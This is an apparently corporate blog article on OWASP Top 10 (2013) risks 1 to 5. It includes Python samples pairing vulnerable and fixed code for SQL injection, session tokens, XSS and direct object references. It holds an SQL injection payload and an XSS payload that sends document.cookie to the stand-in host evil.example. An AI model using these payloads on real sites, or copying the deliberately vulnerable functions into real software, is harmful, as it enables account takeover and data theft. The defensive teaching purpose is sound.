Top 10 OWASP Vulnerabilities (Part 1)


OWASP Top 10 - 2013


In this day and age, insecure software is one of the biggest threats to our way of life. Insecure configurations and flawed code can undermine financial, energy, defense, healthcare, and virtually any other critical infrastructure. As our digital infrastructure becomes more complex, the difficulty of achieving application security grows with it. Fortunately, organizations like the Open Web Application Security Project (OWASP for short) help raise awareness by identifying the most critical risks facing organizations today. At Clarity, we will examine how OWASP affects our community and explain how you can benefit.

What is OWASP?

The Open Web Application Security Project is a non-profit organization devoted to improving the security of software. This open community is dedicated to enabling organizations to develop, purchase, and maintain trustworthy applications. OWASP provides application security standards, research, and a wide range of free tools and documentation to help strengthen the security of software.


OWASP Top 10

In 2013, OWASP updated its Top 10 project to make technology leaders aware of the most critical web application risks. These weaknesses evolve over time as attackers become more sophisticated and tools change. Below are the first five of the Top 10 web application risks that could be affecting your business.

1) Injection

Untrusted data can have serious consequences if it is not handled properly. Injection flaws, such as SQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.
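To make the SQL case concrete, here is an added example (our own illustration, not code from OWASP or from any particular product). It uses an in-memory SQLite table with constructed sample users; the table, the user names, and the function names are assumptions for the demonstration. The vulnerable lookup concatenates the input into the query text, so a value such as `x' OR '1'='1` changes the meaning of the statement and returns every row. The safe lookup binds the value as a parameter, so the same input is compared literally and matches nothing.

```python
import sqlite3


def build_db():
    """Constructed sample database: three users, one of them an admin (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users (username, role) VALUES (?, ?)",
        [("alice", "admin"), ("bob", "user"), ("carol", "user")],
    )
    return conn


def find_user_vulnerable(conn, username):
    """Untrusted input is spliced into the SQL text, so the database engine
    cannot tell where the data ends and the command begins."""
    sql = "SELECT username, role FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn, username):
    """Parameter binding: the value travels separately from the statement,
    so quotes or keywords in the input never alter the query's structure."""
    sql = "SELECT username, role FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


if __name__ == "__main__":
    conn = build_db()
    payload = "x' OR '1'='1"
    # Vulnerable: the WHERE clause becomes username = 'x' OR '1'='1', which is
    # always true, so every account is returned to the attacker.
    print(find_user_vulnerable(conn, payload))
    # Safe: the literal string "x' OR '1'='1" is not a username, so nothing matches.
    print(find_user_safe(conn, payload))
```

The same principle applies to OS and LDAP interpreters: pass untrusted values through an API that keeps data and command separate (argument lists instead of a shell string, an LDAP escaping function for filter values) rather than building the command as text.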

2) Broken Authentication and Session Management

Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users' identities.
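Session tokens are where many of these flaws live, so here is an added example of the server side of session management (our own illustration, not OWASP's code). The `SessionStore` class, its method names, and the cookie name are assumptions. It contrasts a predictable token (a sequential number, which lets anyone who sees one token guess its neighbours) with tokens drawn from the operating system's random generator, and it shows the three behaviours a session store needs: expiry, rotation after login so a token fixed or captured before authentication is worthless, and explicit destruction on logout. The clock is injectable only so the expiry logic can be exercised without waiting.

```python
import secrets
import time


def weak_token(counter):
    """What NOT to do: a sequential (or time-derived) token. An attacker who
    observes one value can enumerate the others and hijack live sessions."""
    return f"{counter:012d}"


class SessionStore:
    """Server-side session store. The token is an opaque random handle; the
    user identity and expiry live here, never inside the token itself."""

    def __init__(self, ttl_seconds=1800, clock=time.time):
        self.ttl = ttl_seconds
        self.clock = clock            # injectable for testing (assumption)
        self._sessions = {}           # token -> (user, expires_at)

    def create(self, user):
        token = secrets.token_urlsafe(32)   # 256 random bits from the OS CSPRNG
        self._sessions[token] = (user, self.clock() + self.ttl)
        return token

    def lookup(self, token):
        """Return the user for a valid, unexpired token, else None."""
        entry = self._sessions.get(token)
        if entry is None:
            return None
        user, expires_at = entry
        if self.clock() >= expires_at:
            del self._sessions[token]   # expired tokens are purged, not revived
            return None
        return user

    def rotate(self, old_token):
        """Issue a fresh token for the same user and invalidate the old one.
        Call this after login or any privilege change (defeats session fixation)."""
        user = self.lookup(old_token)
        if user is None:
            return None
        del self._sessions[old_token]
        return self.create(user)

    def destroy(self, token):
        """Logout: remove the session server-side so the token cannot be replayed."""
        self._sessions.pop(token, None)


def set_cookie_header(token, name="session"):
    """Cookie attributes that keep the token away from scripts (HttpOnly),
    off plaintext connections (Secure) and out of most cross-site requests."""
    return f"{name}={token}; Path=/; HttpOnly; Secure; SameSite=Lax"


if __name__ == "__main__":
    store = SessionStore(ttl_seconds=1800)
    pre_login = store.create("anonymous")      # e.g. a cart session before login
    post_login = store.rotate(pre_login)        # old token now useless
    print(set_cookie_header(post_login))
    print(store.lookup(pre_login), store.lookup(post_login))
```

Compare this with the weak pattern: storing the user name in the cookie, deriving the token from the time or a counter, or leaving a token valid forever. Each of those is an implementation flaw that lets an attacker assume another user's identity without ever learning a password.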

3) Cross-Site Scripting (XSS)

XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation or escaping. XSS allows attackers to execute scripts in the victim's browser, which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
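The fix for reflected and stored XSS is output encoding for the context the data lands in. Here is an added example of the HTML body and HTML attribute cases (our own illustration, not OWASP's code; the payload string, the comment markup and the function names are constructed for the demonstration). The vulnerable renderer drops a user comment straight into the page, so a comment containing a `<script>` element runs in every reader's browser with the site's cookies in scope. The safe renderer encodes the five characters that have meaning to the HTML parser, so the same comment is displayed as text.

```python
import html

# Constructed attacker input: a comment that, if rendered raw, ships the
# victim's cookie to an attacker-controlled host (hostname is hypothetical).
PAYLOAD = '<script>document.location="http://evil.example/?c="+document.cookie</script>'


def render_vulnerable(comment):
    """Untrusted data placed directly into the HTML body."""
    return f'<p class="comment">{comment}</p>'


def render_safe(comment):
    """html.escape encodes < > & " and ', so the browser shows the input as
    text and never starts a new element or attribute from it."""
    return f'<p class="comment">{html.escape(comment, quote=True)}</p>'


def render_attr_safe(title):
    """Attribute context: quote=True is essential here, otherwise input such
    as x" onmouseover="... closes the attribute and adds an event handler."""
    return f'<div title="{html.escape(title, quote=True)}"></div>'


def contains_script_tag(markup):
    """Crude check used only to show the difference between the two renderers."""
    return "<script" in markup.lower()


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))   # browser executes the script
    print(render_safe(PAYLOAD))         # browser displays the text
    print(render_attr_safe('x" onmouseover="alert(1)'))
```

Encoding is context-specific: the HTML entity encoding above is correct for element content and quoted attributes, but data placed inside a JavaScript block, a URL, or a CSS value needs the encoding for that context, and an `href` built from user input must also be restricted to safe schemes, since `javascript:` URLs survive entity encoding untouched.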

4) Insecure Direct Object References

A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.
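The classic case is an invoice or account page addressed by its database key. Below is an added example (our own illustration, not OWASP's code) using a constructed table of invoices; the record layout, user names and function names are assumptions. The vulnerable accessor only checks that the record exists, so a logged-in user who changes the id in the URL reads another customer's invoice. The safe accessor scopes every lookup to the calling user and returns the same result for "missing" and "not yours", so the id space cannot be mapped through differing error responses. The last two functions show the other defence OWASP describes: handing the client indirect, per-user references instead of raw keys.

```python
# Constructed sample records: invoice id -> record (not real data).
INVOICES = {
    1001: {"owner": "alice", "amount": 120.00},
    1002: {"owner": "bob", "amount": 80.00},
    1003: {"owner": "alice", "amount": 45.50},
}


def get_invoice_vulnerable(invoice_id):
    """Direct object reference with no ownership check: any authenticated
    user who rewrites ?id=1001 to ?id=1002 gets another customer's invoice."""
    return INVOICES.get(invoice_id)


def get_invoice_safe(invoice_id, current_user):
    """Same lookup, scoped to the caller. Missing and foreign records both
    come back as None, so an attacker cannot enumerate valid ids by
    distinguishing "not found" from "forbidden"."""
    record = INVOICES.get(invoice_id)
    if record is None or record["owner"] != current_user:
        return None
    return record


def build_reference_map(current_user):
    """Indirect references: give the client small per-user indexes instead
    of database keys. Ownership is decided once, when the map is built,
    and a foreign key simply has no index in this user's map."""
    owned = sorted(k for k, v in INVOICES.items() if v["owner"] == current_user)
    return {index: key for index, key in enumerate(owned, start=1)}


def get_invoice_indirect(index, ref_map):
    """Resolve a client-supplied index through the caller's own map."""
    key = ref_map.get(index)
    return INVOICES[key] if key is not None else None


def probe(current_user, ids):
    """Which of the candidate ids does the safe accessor actually grant?"""
    return [i for i in ids if get_invoice_safe(i, current_user) is not None]


if __name__ == "__main__":
    print(get_invoice_vulnerable(1002))            # bob's invoice, to anyone
    print(get_invoice_safe(1002, "alice"))         # None
    print(probe("alice", [1001, 1002, 1003, 1004]))  # [1001, 1003]
    alice_map = build_reference_map("alice")
    print(alice_map, get_invoice_indirect(2, alice_map))
```

The ownership check belongs next to the data access, not in the UI: hiding the link to another user's invoice does nothing if the server still serves it when asked.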

5) Security Misconfiguration

Good security requires having a secure configuration defined and deployed for not only the application, but also the frameworks, application server, web server, database server, and platform. Secure settings must be defined, implemented, and maintained, as defaults are frequently insecure. Additionally, all software should be kept up to date.

In Part 2 we cover risks 6 through 10 and how you can strengthen your organization against them.